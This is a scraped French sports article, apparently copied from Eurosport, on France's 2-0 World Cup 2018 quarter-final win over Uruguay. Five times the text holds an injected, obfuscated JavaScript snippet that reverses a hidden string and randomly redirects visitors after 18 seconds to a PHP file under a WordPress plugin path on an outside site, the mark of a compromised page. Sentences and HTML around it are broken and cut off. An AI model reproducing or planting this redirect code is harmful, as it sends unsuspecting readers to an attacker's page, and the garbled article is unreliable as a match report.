Coupe du monde 2018 : La France domine l’Uruguay et se qualifie pour les demi-finales (2-0)

tour dans le dernier carré d’un Mondial. Pour y parvenir, les Bleus ont dominé l’Uruguay, vendredi à Nijni Novgorod, à l’issue d’un match dans l’ensemble maîtrisé (2-0). Raphaël Varane a ouvert le score avant la pause. Antoine Griezmann a lui profité d’une erreur grossière de Fernando Muslera pour sceller le sort de la partie.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph” style=”text-align: justify;”>Un match bien géré. Rondement mené. Comme tour dans le dernier carré de la Coupe du monde ! Pour la première fois depuis 2006, elle va jouer une demi-finale de Coupe du monde. Les Bleus, en blanc pour ce quart de finale, sont venus à bout de l’Uruguay (0-2) sur la pelouse de Nijni Novgorod. Sans trembler. En toute logique. La Celeste n’a juste pas fait le poids, en l’absence d’Ce choc face à l’Uruguay s’annonçait tendu. La défense de la Celeste, ce bloc si solide, avait de quoi poser de sérieux soucis aux Bleus. L’attaque uruguayenne, avec sa capacité à se montrer réaliste, aussi. Mais l’absence de Cavani s’est fait cruellement ressentir. Sans lui, sa sélection n’a pas eu le même impact au pressing et n’a pas réussi à mettre en place son jeu. Ce n’est cependant pas le problème de l’équipe de France. Avec Corentin Tolisso aligné au milieu à la place de La revanche de Varane

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/kylian-mbappe_prs440181/person.shtml”>Kylian Mbappé ont encore une fois mis à mal la défense adverse en première période, la lumière est finalement venue sur un… coup franc ! Et c’est Raphaël Varane qui a coupé la trajectoire pour débloquer la situation (0-1, 40e). Une belle revanche pour le défenseur du $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/mats-hummels_prs87436/person.shtml”>Mats Hummels sur un coup de pied arrêté lors du quart de finale au Brésil. Passeur sur le premier but, Antoine Griezmann a ensuite mis les siens à l’abri sur une frappe sèche de 20 mètres qui a fait mouche grâce à une grosse faute de mains de Fernando Muslera (0-2, 61e). Ce but a alors mis KO l’Uruguay.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/luis-suarez_prs207241/person.shtml”>Luis Suarez a ainsi été parfaitement muselé. Et la seule fois où l’arrière-garde bleue a été prise à défaut, $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/martin-caceres_prs113074/person.shtml”>Martin Caceres (44e).

Cinq jours après avoir enflammé la planète football face à l’Argentine, la France a ainsi démontré qu’elle savait s’adapter à l’adversaire. Et proposer autre chose pour poursuivre sa route. Avec cette victoire rassurante, les hommes de Didier Deschamps ont franchi une nouvelle étape et atteint l’objectif fixé par Noël Le Graët. Maintenant, il est temps de rêver en grand.

 

Source: tory.shtml” target=”_blank” rel=”noopener”>Eurosport

  • 3
  •  
  •  
  •  
  •  
    3
    Partages
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :